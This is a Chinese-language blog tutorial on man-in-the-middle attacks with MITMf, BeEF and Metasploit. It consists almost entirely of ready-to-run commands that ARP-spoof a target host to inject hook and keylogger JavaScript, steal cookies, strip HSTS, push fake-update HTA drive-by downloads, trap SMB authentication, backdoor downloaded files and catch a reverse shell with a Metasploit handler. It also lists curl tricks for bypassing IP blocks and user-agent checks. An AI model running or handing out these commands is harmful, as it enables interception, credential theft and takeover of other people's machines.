美文网首页
DNS劫持+XSS攻击高级教程:

DNS劫持+XSS攻击高级教程:

作者: 我准备注销了请取关 | 来源:发表于2019-04-08 12:53 被阅读0次

安装方式一:

安装32位环境:

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

安装Mitmf:

root@kali:~# apt-get install mitmf
root@kali:~# pip uninstall Twisted
root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@kali:~# pip install ./Twisted-15.5.0.tar.bz2

安装方式二:

root@kali:~# get clone https://github.com/byt3bl33d3r/MITMf.git

安装装python-nfqueue+pefile模块:

root@kali:~# sudo apt-get install python-nfqueue,pefile
root@kali:~# sudo apt-get install mitmf*
root@kali:~# pip uninstall twisted
root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@kali:~# pip install ./Twisted-15.5.0.tar.bz2

启动Beef:

root@kali:~# cd /usr/share/beef-xss/
root@kali:~# ./beef

利用BeEFAutorun结合Beef-XSS自动工具:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --beefautorun

Mitmf中间人注入XSS脚本,作为中间人连接网页并插入JS:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http:// 192.168.1.114:3000/hook.js

注入Html iframe框架:

root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --html-url http://www.freebuf.com

注入JavaScript:

root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://linvex.xxx.cn/test.js

注入键盘记录JS:

root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --jskeylogger

查看网页Http Response头指纹信息:

root@kali:~# curl -i url

查看网页HTTP通信过程信息:

root@kali:~# curl -v url

查看网址301+302跳转访问情况:

root@kali:~# curl -IL url

抓取页面内容到一个文件中:

root@kali:~# curl -o home.html url

模拟服务器Post请求:

root@kali:~# curl -vX POST "URL" -d "name=123.jpg"

模拟客服端发送表单数据:

root@kali:~# curl -d "user=aaa&password=12345" http://www.aaa.com/login.php

方案一:

表单XML上传代码:

<form method="post" action="http://upload.qiniu.com/"
enctype="multipart/form-data">
  <input name="key" type="hidden" value="<resource_key>">
  <input name="token" type="hidden" value="<upload_token>">
  <input name="file" type="file" />
</form>

模拟表单信息上传:

root@kali:~# curl -v -F 'key=21211' -F 'token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpbm' -F 'file=@/Users/dxy/sync/photo3.jpg' 183.136.139.10

模拟代理节点:

root@kali:~# curl -voa  up.qiniu.com -F"token=um6IEH7mtwnwkGpjImD08JdxlvViuELhI4mFfoeL:ibL-L03gPbF0Yyjf1XlWiwkRk1s=:eyJzY29wZSI6ImphdmFkZW1vIiwiZGVhZGxpb" -F"file=@10M.file -x 1.1.1.1:80

方案二:

表单XML上传代码:

<form method="POST" enctype='multipart/form-data' action="upload.cgi">
<input type=file name=upload>
    <input type=submit name=press value="OK">
  </form>

利用Curl上传文件:

root@kali:~# curl --form upload=@localfilename --form press=OK url

保存服务器返回Cookie到文件中:

root@kali:~# curl -c cookies url

使用Cookie文件做后续工作:

root@kali:~# curl -b cookies url

利用Curl发送Cookie:

root@kali:~# curl --cookie "name=xxx" url

利用Curl绕过User-Agent认证:

curl --user-agent "User Agent" url

利用Curl代理绕过屏蔽IP:

root@kali:~# curl -x 24.10.28.84:32779 -o home.html url

模拟表单信息,模拟登录,保存头信息:

root@kali:~# curl -D ./cookie_D.txt -F log=aaaa -F pwd=xxxx url/login.php

利用Hsts模块执行ARP欺骗并抓取密文:

root@kali:~# mitmf -i eth0 --spoof --arp  --hsts --gateway 192.168.0.1 --targets 192.168.1.114

利用AppCachePoison模块进行ARP投毒:

root@kali:~# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 –-target 192.168.1.114 --app cache poison

利用HTA Drive-By注入假更新通知并提示下载:

root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --hta drive-by

利用BrowserSniper执行HTA Drive-by攻击:

root@kali:~# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --browsersniper

利用Jskeylogger模块监听键盘记录:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger

利用Upsidedownternet模块获取图片:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.0.114 --upsidedownterne

利用Screen模块截屏:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen

利用Replace模块替换靶机网页:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --replace

利用Ferretng模块获取靶机Cookie:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --ferretng

利用Cachekill模块清除靶机Cookies:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.11 --target 192.168.1.114 --cachekill

利用Browserprofiler模块获取浏览器及插件信息:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler

利用Smbtrap模块进行SMB打印服务445端口:

root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbtrap
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --smbauth

利用Javapwn模块进行Java漏洞攻击:

root@kali:~# mitmf -i eth0 --spoof --gateway 192.168.217.2 --target 192.168.1.114 --javapwn --msfip 192.168.1.100

启动Metasploit模块并监听:

root@kali:~# msfconsole
root@kali:~# use exploit/multi/handler
root@kali:~# set LHOST 192.168.1.114
root@kali:~# set LPORT 1447
root@kali:~# run

欺骗靶机下载文件:

mitmf --iface eth0 --spoof --gateway 192.168.1.1 --target 192.168.1.114 --filepwn
注:通过MSF获取靶机Shell即可拿到主机!

相关文章

网友评论

      本文标题:DNS劫持+XSS攻击高级教程:

      本文链接:https://www.haomeiwen.com/subject/qlsuiqtx.html